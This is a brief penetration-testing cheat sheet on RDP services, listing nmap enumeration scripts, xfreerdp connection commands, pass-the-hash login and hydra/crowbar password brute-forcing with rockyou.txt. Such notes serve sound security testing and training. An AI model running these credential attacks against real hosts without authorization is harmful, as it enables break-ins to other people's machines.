~/hadi

RDP

Enumeration, exploitation and post-exploitation techniques for RDP servers.

rdpnetworkservice
§ table of contents

Overview

RDP (Remote Desktop Protocol) runs on port 3389 and provides a graphical remote session. Common on Windows servers and workstations.

Enumeration

nmap -sV -p 3389 $IP
nmap -p 3389 --script rdp-* $IP

Key scripts:

  • rdp-enum-encryption: checks encryption level
  • rdp-vuln-ms12-020: tests for MS12-020 DoS vulnerability

Connect

xfreerdp /u:$user /p:$password /v:$IP
xfreerdp /u:$user /p:$password /v:$IP /cert:ignore
rdesktop $IP

Pass the hash directly (no plaintext password needed):

xfreerdp /u:$user /pth:$hash /v:$IP

Brute Force

hydra -l $user -P ~/wordlists/rockyou.txt rdp://$IP
crowbar -b rdp -s $IP/32 -u $user -C ~/wordlists/rockyou.txt
← all notes ~/hadi